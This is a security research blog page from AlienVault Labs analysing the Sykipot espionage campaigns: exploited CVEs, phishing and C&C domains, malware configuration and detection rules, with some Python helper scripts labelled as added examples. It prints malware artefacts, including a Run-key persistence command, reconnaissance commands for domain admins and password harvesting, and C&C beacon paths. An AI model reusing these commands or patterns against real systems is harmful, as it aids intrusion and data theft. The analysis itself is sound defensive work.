AlienVault R&D Labs Portal. Get the latest news from our research.

New Sykipot developments

March 21st, 2013 | Posted by jaime.blasco in APT | Attacks | Exploits | Malware | News | Snort - (0 Comments)

Summary

During the last few years, we have been publishing about a group of hackers who have focused on targeting DIB (Defence Industrial Base) and other government organizations:

- Another Sykipot sample likely targeting US federal agencies

- Are the Sykipot’s authors obsessed with next generation US drones?

- Sykipot variant hijacks DOD and Windows smart cards

- Sykipot is back

The Sykipot actors are a highly skilled group of individuals who have exploited a wide range of zero-day vulnerabilities in the last few years, including:

CVE            Date        Product
CVE-2007-0671  2007-02-02  Microsoft Excel
CVE-2009-3957  2010-12-01  Adobe Reader
CVE-2010-0806  2010-05-04  Internet Explorer
CVE-2010-2883  2010-09-08  Adobe Reader
CVE-2010-3654  2010-10-28  Adobe Flash Player
CVE-2011-2462  2011-12-06  Adobe Reader

 

In this blog post we will unveil the new vulnerabilities this group has used during the last 8 months and publish the new infrastructure they have used. We will show several examples of the campaigns they have launched and the new versions of the Sykipot backdoor they have used to access the compromised systems. We have found evidence that they have exploited at least the following vulnerabilities during the last few months:

CVE            Date        Product
CVE-2012-1889  06/13/2012  MSXML/Internet Explorer
CVE-2012-1723  06/12/2012  Java 7
CVE-2012-4969  09/16/2012  Microsoft Internet Explorer
CVE-2013-0640  02/12/2012  Adobe Acrobat Reader

 

Several times the exploit was in use only a few days after the vulnerability had been disclosed, before the vendor had released a patch.

Campaigns

In the past, most of the campaigns we found related to the Sykipot actors were based on spear-phishing mails with attachments that exploited vulnerabilities in software like Microsoft Office, Adobe Flash, Adobe PDF and sometimes Internet Explorer. During the last 8-10 months we have seen a change: the number of spear-phishing campaigns that include a link instead of an attachment has increased. Once the victim clicks the link, the attackers use vulnerabilities in Internet Explorer, Java, etc. to access the system.

Some examples of the campaigns they have launched are detailed below.

gsasmartpay.org – 2012-06-20

Last summer, we found a malicious site that the Sykipot actors set up to try to phish government employees. When the victim visited the link, the following page appeared:


As we can see, it shows the information present at https://smartpay.gsa.gov/cardholders.

“The GSA SmartPay program, established in 1998, is the largest charge card program in the world serving more than 350 federal agencies, organizations, and Native American tribal governments. In FY10, approximately 98.9M transactions were made and $30.2B were charged using the GSA SmartPay charge cards, creating $325.9M in refunds.”

“Eligibility for the program is determined by the GSA SmartPay Contracting Officer. Federal agencies, departments, tribal organizations, and approved non-federal entities can apply to obtain charge card services under the GSA SmartPay program.”

If we take a look at the malicious files, we find that the page was exploiting CVE-2012-1889 in the background:


During the exploitation it will load the following files as well:

www[.]gsasmartpay[.]org/cardholders/login/movie[.]swf?apple=AA969692D8CDCD959595CC859183918F83909692839BCC8D9085CD83868D808784CC919584E2E2E2E2
www[.]gsasmartpay[.]org/cardholders/login/deployJava[.]js
www[.]gsasmartpay[.]org/cardholders/login/faq[.]htm

We are not going to show how this vulnerability is exploited since we have shown it in previous blog posts; you can find a good description here.

searching-job.net is another domain registered by the Sykipot actors (registered by thomas7610@yahoo.com on 06-20-2012) that was also serving the same exploit at that time:

www[.]searching-job[.]net/list/verification/deployJava[.]js
www[.]searching-job[.]net/list/verification/faq[.]htm
www[.]searching-job[.]net/list/verification/index[.]htm
www[.]searching-job[.]net/list/verification/movie[.]swf?apple=AA969692D8CDCD959595CC91878390818A8B8C85CF888D80CC8C8796CD848B8E878E8B9196CC868396E2E2E2E2
www[.]searching-job[.]net/account_list/verification/index[.]htm
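The `apple` parameter in the two movie.swf URLs above is hex-encoded, but the post does not say what the bytes encode. The following Python script is an added example, not code from the original post: it assumes the bytes carry a single-byte XOR layer, brute-forces the key and accepts the first key that turns the blob into printable text containing "://". Run over the two values quoted above it recovers key 0xE2 and, in each case, a URL on the same host as the exploit page (the trailing E2 bytes decode to NUL padding). The decoded values are derived from the page's own data; nothing else is assumed.

```python
"""Decode the hex-encoded `apple` parameter passed to movie.swf (added example).

Assumption: the bytes are obfuscated with a single-byte XOR key. The key is not
known in advance, so every key is tried and the first one that yields printable
text containing "://" is accepted.
"""
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# The two parameter values copied from the URLs quoted in the post.
SAMPLES = {
    "gsasmartpay": (
        "AA969692D8CDCD959595CC859183918F83909692839BCC8D9085CD83868D808784CC919584E2E2E2E2"
    ),
    "searching-job": (
        "AA969692D8CDCD959595CC91878390818A8B8C85CF888D80CC8C8796CD848B8E878E8B9196CC868396E2E2E2E2"
    ),
}


def xor_single(data: bytes, key: int) -> bytes:
    """XOR every byte with the same key byte."""
    return bytes(b ^ key for b in data)


def looks_like_text(candidate: bytes) -> bool:
    """Printable ASCII only, allowing NUL padding at the end."""
    body = candidate.rstrip(b"\x00")
    return len(body) > 0 and all(0x20 <= b < 0x7F for b in body)


def recover_key(blob: bytes) -> Optional[int]:
    """Try all 256 keys; return the first that gives a URL-like string."""
    for key in range(256):
        out = xor_single(blob, key)
        if looks_like_text(out) and b"://" in out:
            return key
    return None


def decode_param(hex_value: str) -> Tuple[int, str]:
    """Return (key, decoded string) for one apple= value, or raise."""
    blob = bytes.fromhex(hex_value)
    key = recover_key(blob)
    if key is None:
        raise ValueError("no single-byte XOR key yields a URL-like string")
    plain = xor_single(blob, key).rstrip(b"\x00").decode("ascii")
    return key, plain


def decode_from_url(defanged_url: str) -> Tuple[int, str]:
    """Accept a defanged URL as printed in the post ('[.]' for '.'),
    extract the apple= query parameter and decode it."""
    url = defanged_url.replace("[.]", ".")
    if "://" not in url:
        url = "http://" + url
    params = parse_qs(urlsplit(url).query)
    return decode_param(params["apple"][0])


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        key, plain = decode_param(value)
        print(f"{name}: key=0x{key:02X} -> {plain}")
```

The brute force is cheap (256 candidates) and the acceptance test is deliberately narrow, so a wrong key is rejected rather than reported as garbage; for parameters that do not carry a URL the "://" check would need to be replaced by another plaintext test.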

 

Apart from gsasmartpay.org we have found several domains registered by the Sykipot actors that they have probably used to phish users in the last few months. Some of the most suspicious ones are detailed below:

- dfasonline.com registered by alcott.churchill@yahoo.com on 06-19-2012

Probably related to Defense Finance and Accounting Service – DFAS - http://www.dfas.mil/

- aafbonus.com registered by janagreen2000@yahoo.com on 06-19-2012

Probably related to American Advertising Federation – http://www.aaf.org/ 

- nceba.org registered by jimgreen200088@yahoo.com on 07-24-2012

Probably related to U.S. BANKRUPTCY ADMINISTRATOR - http://www.nceba.uscourts.gov/

- pdi2012.org registered by alcott.churchill@yahoo.com on 08-18-2011

Probably related to PDI 2012, the premier training event hosted by the American Society of Military Comptrollers

- hudsoninst.com registered by alcott.churchill@yahoo.com on 11-26-2012

Probably related to the Hudson Institute – http://www.hudson.org/ 

Hudson Institute is a nonpartisan, independent policy research organization dedicated to innovative research and analysis that promotes global security, prosperity, and freedom.

 

CVE-2012-4969 – Internet Explorer

In September last year, the Sykipot actors registered several domains to exploit a vulnerability in Internet Explorer (CVE-2012-4969).

- resume4jobs.net registered by james.wade1@yahoo.com on 03-08-2012

URLs involved:

http://www[.]resume4jobs[.]net/account/1024486[.]html

http://www[.]resume4jobs[.]net/account/embed[.]htm

http://www[.]resume4jobs[.]net/jobs[.]exe Sykipot malware that uses info[.]resume4jobs[.]net as the C&C

- paypal1.dns1.us – Dynamic DNS provider

URLs involved:

http://paypal1[.]dns1[.]us/account/1024486[.]html

http://paypal1[.]dns1[.]us/account/embed[.]htm

- pollingvoter.org registered by jimgreen200088@yahoo.com on 06-11-2012

URLs involved:

http://www[.]pollingvoter[.]org/ne2012/vote/embed[.]htm

http://www[.]pollingvoter[.]org/life[.]exe Sykipot malware that uses www[.]betterslife[.]com as the C&C

- skyruss.net registered by joneluxara@yahoo.com on 04-17-2012

URLs involved:

http://social[.]sns[.]skyruss[.]net/variety/index[.]html

http://forum[.]skyruss[.]net/articles/embed[.]htm

 

CVE-2012-1723 – Java 7

In August, they were exploiting a vulnerability in Java (CVE-2012-1723) to gain access to the victim’s systems. It seems they were using the Metasploit version of the exploit.

Some examples are:

- slashdoc.org registered by jessantt@gmail.com on 05-21-2012

URLs involved:

http://www[.]slashdoc[.]org/default[.]jar

http://www[.]slashdoc[.]org/index[.]html

The index.html page loads the malicious Java applet and it passes the payload they want to execute using the data parameter (the value is hex encoded):


In this case the host www[.]photosmagnum[.]com was used as the C&C server.

- nceba.org registered by jimgreen200088@yahoo.com on 07-24-2012

URLs involved:

http://www[.]nceba[.]org/newsroom/article/news201207240251[.]html

http://www[.]nceba[.]org/newsroom/article/default[.]jar

Using www[.]betterslife[.]com as the C&C server.

- milstars.org registered by slyan8024@gmail.com on 06-20-2012

URLs involved:

http://milstars[.]org/view/default[.]jar

 

CVE-2013-0640 – PDF Exploit targeting Japanese victims

We found the Sykipot actors using the latest Adobe Acrobat exploit (CVE-2013-0640) a few weeks ago.

The version of the exploit is the same one we found in our latest blog post:

- Latest Adobe PDF exploit used to target Uyghur and Tibetan activists

The JavaScript code inside the PDF file is very similar to the one found in the Itaduke samples, but some of the initial variables and the obfuscation have been removed from the original one.

Once the PDF is opened the following lure file is displayed to the victim:


Based on the content of the lure document, the potential victims seem to be somehow related to the Japanese Ministry of Health, Labour and Welfare.

Once the infection takes place, the following files are created on the system:

\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pfilede.dat 5ED3A94354F27BC7AF0FEF04F89D8EB8
\DOCUME~1\ADMINI~1\LOCALS~1\mpr.dll 84EFAFF343CF7A34D2A0D847A1E5FD50
\DOCUME~1\ADMINI~1\LOCALS~1\setm.ini 00051F392350128BA4DD4CA10F44DDEF
\DOCUME~1\ADMINI~1\LOCALS~1\temp.dll BEA84BE4BFE236652F6A4E382B21A96F

The file setm.ini contains the configuration of Sykipot in this case:

[srv_info]
sleeptime=3600000
url=bassball[.]peocity[.]com (C&C server)
scexe=rsvp.exe
scdll=mpr.dll
runexe=run.exe
mark=0304adbh

The following actions take place in the system:

cmd /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v start /t REG_SZ /d [sykipot_payload_file].exe -startup /f (persistence)

Several functions are called within the Sykipot’s DLL:

[sykipot_payload_file].exe -startupEx
[sykipot_payload_file].exe -startup1
cmd /c [sykipot_payload_file].exe -startup

Then the malicious payload will be injected into Internet Explorer.

The malware will communicate with the C&C server once in a while using SSL and the well known communication paths of previous Sykipot payloads:

/kys_allow_put.asp?type=
/kys_allow_get.asp?name=

As we showed in the past, most of the Sykipot samples used the key "19990817" for encryption. In this sample we have found a new key, "20120709", which is also a date.

 

Infrastructure

Along with the blog post we are making a list of new domains public that weren’t mentioned in previous Sykipot research:

Unique malicious domains:

  • peocity.com
  • rusview.net
  • skyruss.net
  • commanal.net
  • natareport.com
  • photogellrey.com
  • photogalaxyzone.com
  • insdet.com
  • creditrept.com
  • pollingvoter.org
  • dfasonline.com
  • hudsoninst.com
  • wsurveymaster.com
  • nhrasurvey.org
  • pdi2012.org
  • nceba.org
  • linkedin-blog.com
  • aafbonus.com
  • milstars.org
  • vatdex.com
  • insightpublicaffairs.org
  • applesea.net
  • appledmg.net
  • appleintouch.net
  • seyuieyahooapis.com
  • appledns.net
  • emailserverctr.com
  • dailynewsjustin.com
  • hi-tecsolutions.org
  • slashdoc.org
  • photosmagnum.com
  • resume4jobs.net
  • searching-job.net
  • servagency.com
  • gsasmartpay.org
  • tech-att.com

We are releasing Snort rules to detect queries to the malicious domains in your network:
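The rules themselves were published as an image with the post and in the EmergingThreats ruleset. As an added example, not the rules AlienVault or EmergingThreats shipped, the following Python script shows how "DNS lookup" rules of the usual shape are generated for a domain list: each label is written as its length byte followed by the label, the name is terminated with |00|, and the match is anchored on a standard query header. The domain list is a subset of the one above; the sid range starting at 9000001 is a placeholder to be replaced with your local range.

```python
"""Generate Snort rules that alert on DNS queries for known-bad domains (added example).

Assumptions: the sid range is a placeholder; the rule shape (DNS header anchor
plus label-length encoded query name) follows common practice and is not the
published Sykipot ruleset.
"""
import re
from typing import List

# A few of the domains listed in the post.
DOMAINS = [
    "peocity.com",
    "rusview.net",
    "skyruss.net",
    "pollingvoter.org",
    "searching-job.net",
    "gsasmartpay.org",
]

_LABEL = re.compile(r"[a-z0-9-]+")


def dns_wire_name(domain: str) -> str:
    """Render a domain as the Snort content string matching its DNS wire-format
    name: each label is prefixed by its length byte and the name ends with |00|.
    'peocity.com' -> '|07|peocity|03|com|00|'"""
    parts = []
    for label in domain.strip(".").lower().split("."):
        if not (1 <= len(label) <= 63) or not _LABEL.fullmatch(label):
            raise ValueError(f"bad DNS label {label!r} in {domain!r}")
        parts.append(f"|{len(label):02X}|{label}")
    return "".join(parts) + "|00|"


def snort_dns_rule(domain: str, sid: int, family: str = "Sykipot") -> str:
    """One rule for UDP/53 queries. The first content anchors on the DNS header
    flags 0x0100 (standard query, RD set) and QDCOUNT=1 at offset 2; the second
    matches the encoded name after it. nocase covers mixed-case queries."""
    return (
        "alert udp $HOME_NET any -> any 53 "
        f'(msg:"MALWARE {family} DNS lookup {domain}"; '
        'content:"|01 00 00 01|"; offset:2; depth:4; '
        f'content:"{dns_wire_name(domain)}"; nocase; distance:0; fast_pattern; '
        "classtype:trojan-activity; "
        f"sid:{sid}; rev:1;)"
    )


def generate_rules(domains: List[str], first_sid: int, family: str = "Sykipot") -> List[str]:
    """Assign consecutive sids, dropping duplicate domains from the input list."""
    rules: List[str] = []
    seen = set()
    for domain in domains:
        d = domain.strip(".").lower()
        if d in seen:
            continue
        seen.add(d)
        rules.append(snort_dns_rule(d, first_sid + len(rules), family))
    return rules


if __name__ == "__main__":
    print("\n".join(generate_rules(DOMAINS, 9000001)))
```

Because the encoded name is matched as a substring, a query for a host under one of these domains (for example the bassball host under peocity.com mentioned later in the post) also triggers the rule. Queries carried over TCP/53 are not covered by these UDP rules.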


Thanks to EmergingThreats for the help. You will find the rules in their ruleset update today as well.

Based on our research, below is the list of unique e-mail addresses used to register malicious domains:

  • 233@lao.com
  • Joneluxara@yahoo.com
  • alcott.churchill@yahoo.com
  • b@bvc.com
  • calvin.kliff@yahoo.com
  • carrier.fisher@hotmail.com
  • conan0557@126.com
  • james.wade1@yahoo.com
  • janagreen2000@yahoo.com
  • jessantt@gmail.com
  • jimgreen200088@yahoo.com
  • jimgreen20008@yahoo.com
  • marialreyna11211919@yahoo.com
  • morgan.wale1@yahoo.com
  • mskinner62@yahoo.com
  • myhog@hotmail.com
  • parviz7415@yahoo.com
  • slyan8024@gmail.com
  • thomas7610@yahoo.com

Apart from the list of new domains, you should check out the domains mentioned in the following articles. They all relate to previous Sykipot activity, but some of them are still being used in Sykipot operations:

- Sykipot is back - AlienVault Labs

- The Sykipot Attacks - Symantec

- The Sykipot Campaign - TrendMicro

- Hurricane Sandy serves as lure to deliver Sykipot - Verizon

- Insight into Sykipot Operations - Symantec

- Medical Industry A CYBER VICTIM: BILLIONS STOLEN AND LIVES AT RISK - Cyber Squared


jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.


Sykipot is back

July 2nd, 2012 | Posted by jaime.blasco in APT | Attacks | Blog | Exploits | Malware - (Comments Off)

It has been a while since we published information about Sykipot. The last time we blogged about it, we discovered a variant that was able to bypass two-factor authentication to access protected resources on the victim’s network.

We have detected a new wave of Sykipot campaigns that has been running during the past weeks. There are several changes between the new Sykipot campaigns and the older ones.

The first difference is that in previous campaigns the Sykipot authors mainly used file-format exploits to gain access to the systems through spearphishing mails. This is the list of file-format exploits used in the past:

CVE            Date        Product
CVE-2007-0671  2007-02-02  Microsoft Excel
CVE-2009-3957  2010-12-01  Adobe Reader
CVE-2010-0806  2010-05-04  Internet Explorer
CVE-2010-2883  2010-09-08  Adobe Reader
CVE-2010-3654  2010-10-28  Adobe Flash Player
CVE-2011-2462  2011-12-06  Adobe Reader

This time it seems they are mainly using drive-by-download exploits like CVE-2011-0611 affecting Flash Player or the new Windows XML Core zero-day vulnerability.

The CVE-2012-1889 vulnerability is related to Google's warnings on state-sponsored attacks.

Instead of attaching malicious files on e-mails, they send e-mails to the victims with a malicious link. Once the victim clicks on the link the malicious server tries to exploit a vulnerability on the user’s browser.

The modus operandi of the group behind these attacks seems to be the same as in the past. The attackers hack US based servers and then install software to serve the malicious content or to redirect the connections to a remote server.

The malware continues to use SSL to communicate with the C&C server. Once executed, the malware tries to get a configuration file from a remote server. The older versions used an underlying encryption with the XOR key "19990817" for the config files. The XOR obfuscation has been removed, and in the new versions a simple byte subtraction routine is used.


The configuration file is requested from a remote server using the following URL format:

GET /get.asp?nm=index.dat&hnm=[HOSTNAME]-[IP-ADDRESS]-[IDENTIFIER]     (SSL based)

They continue to use the hardcoded referer 'www.yahoo.com' on the requests.
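The configuration fetch above, together with the older /kys_allow_get.asp?name= and /kys_allow_put.asp?type= paths from the first post, gives a defender a concrete request shape to look for. The following Python script is an added example, not code from the post: it scans proxy log lines for those URI shapes, checks that the hnm value has the HOSTNAME-IP-IDENTIFIER layout, and treats the hard-coded www.yahoo.com referer on a request to a non-Yahoo host as a weaker supporting indicator. Since the beacons ride over SSL, these fields are only visible where TLS is terminated or inspected at the proxy. The log format, host names and sample lines are constructed for the example.

```python
"""Flag Sykipot C&C request shapes in HTTP proxy logs (added example).

Patterns taken from the post: /get.asp?nm=index.dat&hnm=[HOSTNAME]-[IP-ADDRESS]-[IDENTIFIER]
with Referer www.yahoo.com, and the earlier /kys_allow_get.asp?name= and
/kys_allow_put.asp?type= paths. The log format and sample lines are constructed.
"""
import re
from typing import Dict, List

KYS_RX = re.compile(r"^/(?:[^?]*/)?kys_allow_(?:get|put)\.asp\?(?:name|type)=", re.I)
GET_RX = re.compile(r"^/get\.asp\?nm=index\.dat&hnm=([^&]+)", re.I)
# HOSTNAME-IPv4-IDENTIFIER; host names may themselves contain '-'
HNM_RX = re.compile(r"^.+-\d{1,3}(?:\.\d{1,3}){3}-.+$")
HARDCODED_REFERER = "www.yahoo.com"

STRONG = {"kys_allow C&C path", "get.asp index.dat fetch with HOST-IP-ID beacon"}

# Constructed proxy log: ts client method host uri referer ('-' when absent)
SAMPLE_LOG = """\
2012-07-01T10:02:11 10.0.0.15 GET c2.example.invalid /get.asp?nm=index.dat&hnm=WS01-10.0.0.15-ID001 www.yahoo.com
2012-07-01T10:05:00 10.0.0.22 GET c2.example.invalid /asp/kys_allow_get.asp?name=getkys.kys -
2012-07-01T10:06:00 10.0.0.30 GET www.yahoo.com /index.html www.yahoo.com
2012-07-01T10:07:00 10.0.0.31 GET shop.example.invalid /get.asp?nm=catalog.dat www.google.com
2012-07-01T10:08:00 10.0.0.31 GET news.example.invalid /story.html www.yahoo.com
"""


def classify(uri: str, host: str, referer: str) -> List[str]:
    """Return the list of indicators a single request matches (empty if none)."""
    reasons = []
    if KYS_RX.search(uri):
        reasons.append("kys_allow C&C path")
    m = GET_RX.search(uri)
    if m and HNM_RX.match(m.group(1)):
        reasons.append("get.asp index.dat fetch with HOST-IP-ID beacon")
    if referer.lower() == HARDCODED_REFERER and not host.lower().endswith("yahoo.com"):
        reasons.append("hard-coded www.yahoo.com referer to non-Yahoo host")
    return reasons


def scan(log_text: str) -> List[Dict[str, object]]:
    """Scan the log; severity is 'high' when a path indicator matched,
    'low' when only the referer indicator did."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, host, uri, referer = line.split()
        reasons = classify(uri, host, referer)
        if reasons:
            hits.append({
                "ts": ts, "client": client, "host": host, "uri": uri,
                "reasons": reasons,
                "severity": "high" if STRONG & set(reasons) else "low",
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["severity"], hit["client"], hit["host"], hit["uri"], "; ".join(hit["reasons"]))
```

The referer-only match is kept at low severity on purpose: a stale or spoofed Referer header is common enough that it should raise a hunt lead, not a page.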

The new configuration format supports several commands and most of the previous names have changed. This is the list of supported instructions:

- porth – List of active connections (netstat-like)

- processh – List of processes running on the system

- tasklisth – List of processes (tasklist.exe-like)

- serviceslisth – List of running services and their status (running/stopped)

- starth – Starts a service

- stoph – Stops a service

- delh – Deletes a file

- gh – Gets a file from the C&C server

- ph – Uploads a file to the C&C server

- dir/h – Lists a directory/file

- dir/sh – Lists a directory/file

- runh –

- EXITH – Deletes the malware from the system

- info – Executes a command (WinExec)

- without param – Gets network info and startup time

- sleeph – Sleeps a number of seconds

Once the malware downloads the config file, it executes every instruction, saves the results and obfuscates the data using the subtraction routine. Finally, it sends the results to the C&C server.

Some of the known Sykipot domains that are being used to serve malicious content or as C&C domains are:

- newcarstyle.com

- nhrasurvey.org

- quicksurveypro.com

- contractspt.com

- betterslife.com

- aeroconf13.org

- e-landusa.net

- photosmagnum.com

- reythy.com

Most of the domains have been registered during the last month and they have used the mail address jimgreen200088 [at] yahoo.com to register most of them.

The Netbox webserver used in previous campaigns is also present on most of the C&C servers.

Note the domain aeroconf13.org seems to be related with a spearphishing campaign against potential attendees of the IEEE Aerospace Conference (the International Conference for Aerospace Experts, Academics, Military Personnel, and Industry Leaders).

We will continue to offer more information on these new campaigns as we find more details. Stay tuned for more information, and apply your patches!


For several weeks there has been a great deal of talk about the “undeclared global cyber war”. There have been accusations that China is stealing almost anything they choose and that they have a “shopping list” that gives priority to key industries like:

  1. Clean energy industry
  2. Biotechnology
  3. Semiconductors
  4. Information technology
  5. Aerospace technology
  6. Medical technology

This month, Lockheed Martin raised the alarm on an Adobe Reader zero-day exploit that was being exploited in the wild. Once again the payload dropped was Sykipot, a known malware that has appeared several times in combination with zero-day exploits and has been used to launch targeted attacks since 2007. The list of known zero-day exploits used by Sykipot's authors during these years is as follows:

CVE            Date        Product
CVE-2007-0671  2007-02-02  Microsoft Excel
CVE-2009-3957  2010-12-01  Adobe Reader
CVE-2010-0806  2010-05-04  Internet Explorer
CVE-2010-2883  2010-09-08  Adobe Reader
CVE-2010-3654  2010-10-28  Adobe Flash Player
CVE-2011-2462  2011-12-06  Adobe Reader

The “drone” campaign

There have been a lot of different campaigns with different command-and-control servers. The modus operandi is simple: they send emails with a malicious attachment or link, sometimes using a zero-day exploit, to key employees of different organizations.

In most of the campaigns the malware dropped displays a document or media file attractive to the victim. After analyzing most of the campaigns, we discovered a group of samples connecting to the same C&C server that attracted our attention because of the media displayed after the infection:

As you can see, all the content is related to US UCAVs (unmanned combat air vehicles):

We can imagine that this campaign could target organizations related to the technology used in this kind of vehicle, like the aerospace and military industries.

Some of the mails used contain attachments with names like:

  • X-37B Orbital Test Vehicle.scr
  • X-45b.scr

With the information we collected it appears that this campaign has been running for months. The domain used for the C&C server was registered on 2011-03-04 and we detected two different campaigns with timestamps on 09/08/2011 and 09/26/2011.

Here is the list of analyzed samples:

MD5                               Creation Date                              Campaign String
d978d8071c19a4aca13b4180d250f4db  09/08/2011 13:16:19                        -help20110908
425c0856e5aec8bdf91ac0cf5aec2805  04/19/2011 12:55:24 / 09/08/2011 13:16:19  -help20110908
cb0ceb37e2eb11ea4ee5090a09fd8b4d  09/26/2011 09:16:19                        -help20110926
6f8601931c450e1f79ae560f4de98665  04/19/2011 12:55:24 / 09/26/2011 09:16:40  -help20110926
23309fbec1b3a063415c00fbeb50ee66  04/19/2011 12:55:24 / 09/26/2011 09:16:40  -help20110926
e36a8ff79bc641530071da6c8b8f15d7  04/19/2011 12:55:24 / 09/26/2011 09:16:40  -help20110926
45b8cb1b9aa3c22ff10a2a00deed82a6  04/19/2011 12:55:24 / 09/08/2011 13:16:19  -help20110908
bf61f5d008c385b63429127849998745  04/19/2011 12:55:24 / 09/08/2011 13:16:19  -help20110908
248def2faa654efb0fb4c4d594757957  04/19/2011 12:55:24 / 09/08/2011 13:16:19  -help20110908
08883b00a3969db54bbfb7bb1a20b531  09/08/2011 13:16:05                        -help20110908
5144c11008eae61f7c654794b00b119d  04/19/2011 12:55:24 / 09/08/2011 13:16:19  -help20110908

(Rows with two creation dates list both timestamps found in the sample.)

As we have discussed previously, the trojan injects itself into the Internet Explorer, Firefox or Outlook process memory and then connects to the C&C server, retrieving an encrypted configuration file with commands to execute on the victim's system, and then sends the results back to the C&C server. In this case the config file is as follows:

C:\DOCUME~1\user\CONFIG~1\gthelp.tmp,0
iexplore
findpass2000
process
ipconfig /all
net start
net view /domain
net group "domain admins" /domain
tasklist /v
net localgroup administrators
dir c:\*.url /s
systeminfo
type c:\boot.ini

 

Apart from this, the C&C mechanism permits the following actions:

  1. cmd
  2. shell
  3. run
  4. getfile
  5. putfile
  6. kill
  7. process
  8. reboot
  9. time
  10. door

Tracing C&C servers

After an analysis of the different domains used this year by Sykipot and the C&C headers and data, we discovered that they were using hacked servers mainly in the US to mask the real C&C server.

It appears that they used well-known public exploits to hack into US-based servers and then install software to proxy the connections between the infected systems and the real C&C server.

We realized that most of the C&C servers were running a webserver called “Netbox” (http://www.netbox.cn) and most of them were using a self-signed certificate with the following subject:

/C=US/ST=North Carolina/L=Salisbury/O=Internet Widgits Pty Ltd/OU=VeriSign Trust Network/CN=ITU Server/emailAddress=marry.smith@ltu.edu

After a short investigation of the Netbox webserver, we learnt that it is a Windows-based webserver that allows developers to compile and deploy ASP web applications into a stand-alone executable file.

We also checked Shodan and discovered that there were only a couple of thousand servers running the webserver, and nearly 80% of them were located in China.

With this information, we thought there was a good chance of locating these servers in Chinese network ranges. So we began to search for Netbox servers running SSL on port 443 with a certificate issued to marry.smith@ltu.edu on the main Chinese ISPs.

After some time, we confirmed our suspicion and found 7 IP addresses belonging to "China Unicom Beijing province network" that matched our criteria.

Six of them were pointing to the same webserver (same certificate, same headers, same timestamps), so it appears that they are using those machines to proxy the connections as well, but we don't know if one of them was the final C&C server.

The certificate information was provided as a download with the original post. There was another server serving a different certificate that seems to point to a different C&C server; that certificate was provided as a second download.

Here is the map with the active redirections (2011-12-17):

As we can see, the malware authors are masking the C&C behind US servers in order to make the connections less suspicious, as well as using SSL certificates that contain a mail address from Lawrence Tech University (marry.smith@ltu.edu).

They are using the default common name on the certificate. I have seen this behavior in other malware C&Cs. In order to detect a remote site serving this kind of certificate, it is good to run the following IDS signature:

alert tcp any 443 -> any any (msg:"POLICY self-signed certificate default common name detected"; flow:established,to_client; ssl_state: server_hello; content:"|16|"; content:"|0b|"; within:8; content:"Internet Widgits Pty Ltd"; within:400; classtype:bad-unknown; sid:11111111113; rev:8;)

Apart from this rule, I think it is good to run the following rules for a while to detect the certificate serial number and any other certificates they may be serving with the marry.smith@ltu.edu mail address:

alert tcp any 443 -> any any (msg:"MALWARE Sykipot certificate serial number detected"; flow:established,to_client; ssl_state: server_hello; content:"|16|"; content:"|0b|"; within:8; content:"|00 ec 32 09 67 c9 34 3f 50|"; within:30; classtype:bad-unknown; sid:11111111112; rev:8;)
alert tcp any 443 -> any any (msg:"MALWARE Sykipot certificate subject emailAddress detected"; flow:established,to_client; ssl_state: server_hello; content:"|16|"; content:"|0b|"; within:8; content:"marry.smith@ltu.edu"; within:400; classtype:bad-unknown; sid:11111111113; rev:8;)
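The two checks the rules above express on the wire (the OpenSSL placeholder organisation and the watched emailAddress) can also be applied to certificate subjects already logged by a TLS monitor. The following Python script is an added example, not part of the post: it parses an OpenSSL one-line subject of the form shown above and reports which of those two checks it trips. It assumes a subject value never contains an unescaped "/", which holds for the subject quoted in the post.

```python
"""Assess an X.509 subject string for the two Sykipot certificate indicators (added example).

Input format is OpenSSL's one-line '/K=V/K=V' rendering, as quoted in the post.
Assumption: values contain no unescaped '/' (backslash-escaped ones are handled).
"""
import re
from typing import Dict, List

# Subject exactly as printed in the post.
SYKIPOT_SUBJECT = (
    "/C=US/ST=North Carolina/L=Salisbury/O=Internet Widgits Pty Ltd"
    "/OU=VeriSign Trust Network/CN=ITU Server/emailAddress=marry.smith@ltu.edu"
)

# Indicator values taken from the post.
OPENSSL_DEFAULT_O = "Internet Widgits Pty Ltd"   # OpenSSL's default, left in place by the cert author
WATCHED_EMAILS = {"marry.smith@ltu.edu"}

_PAIR = re.compile(r"/([A-Za-z]+)=((?:[^/\\]|\\.)*)")


def parse_subject(dn: str) -> Dict[str, str]:
    """Turn '/C=US/ST=North Carolina/...' into {'C': 'US', 'ST': 'North Carolina', ...}.
    Raises ValueError on anything that is not a well-formed one-line subject."""
    if not dn.startswith("/"):
        raise ValueError("expected an OpenSSL one-line subject starting with '/'")
    fields: Dict[str, str] = {}
    pos = 0
    for m in _PAIR.finditer(dn):
        if m.start() != pos:
            raise ValueError(f"unparsable subject near offset {pos}")
        fields[m.group(1)] = m.group(2).replace("\\/", "/")
        pos = m.end()
    if pos != len(dn):
        raise ValueError("trailing data in subject")
    return fields


def assess_subject(dn: str) -> List[str]:
    """Return the indicators the subject matches, in a fixed order."""
    fields = parse_subject(dn)
    findings = []
    if fields.get("O") == OPENSSL_DEFAULT_O:
        findings.append("default-openssl-org")
    if fields.get("emailAddress", "").lower() in WATCHED_EMAILS:
        findings.append("watched-email")
    return findings


if __name__ == "__main__":
    print(parse_subject(SYKIPOT_SUBJECT))
    print(assess_subject(SYKIPOT_SUBJECT))
```

The first finding on its own is only a policy signal, exactly like the POLICY rule above: plenty of harmless self-signed certificates keep the OpenSSL defaults. It is the combination with the watched address, or with the serial number the second rule matches, that makes the hit specific.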

Who is behind Sykipot

We shouldn't jump to conclusions, but whoever is behind Sykipot is massively collecting information from targeted victims across dozens of industries.

It's true that the piece of malware isn't too sophisticated, but it is related to at least six zero-day attacks that require skills and/or money. Anyway, we have seen that "not too sophisticated malware" works; see Shady RAT for instance, which targeted organizations ranging from defense contractors to accounting firms.

On the other hand, we have identified at least six Chinese ip addresses that are used to proxy or host the C&C servers. We also identified a tool that the Sykipot authors use to package and create campaigns:

In some of the samples it contains some Chinese error messages.

